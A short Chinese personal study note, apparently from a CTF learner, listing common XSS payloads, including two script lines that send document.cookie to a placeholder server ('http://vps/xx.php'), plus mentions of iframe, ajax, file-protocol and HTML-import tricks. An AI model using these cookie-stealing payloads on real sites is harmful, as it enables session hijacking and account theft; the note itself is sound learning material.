这个题目很虚…我其实不是很懂…
我先记录一下不懂得东西, 以后也许会懂
只是看到题目中常用的payload

<script>window.open('http://vps/xx.php?cookie=' + document.cookie); </script>
<script>window.location.href = 'http://vps/xx.php?cookie=' + document.cookie; </script>

还有建一个iframe的, 建一个a标签, click一下的, 还有import的, 还有ajax来open一下的

在什么情况下ajax可以用file协议读本地文件

emmmmmm, 还有一些知识, 比如

<link rel="import" href="data:text/html;base64, xxxyyy">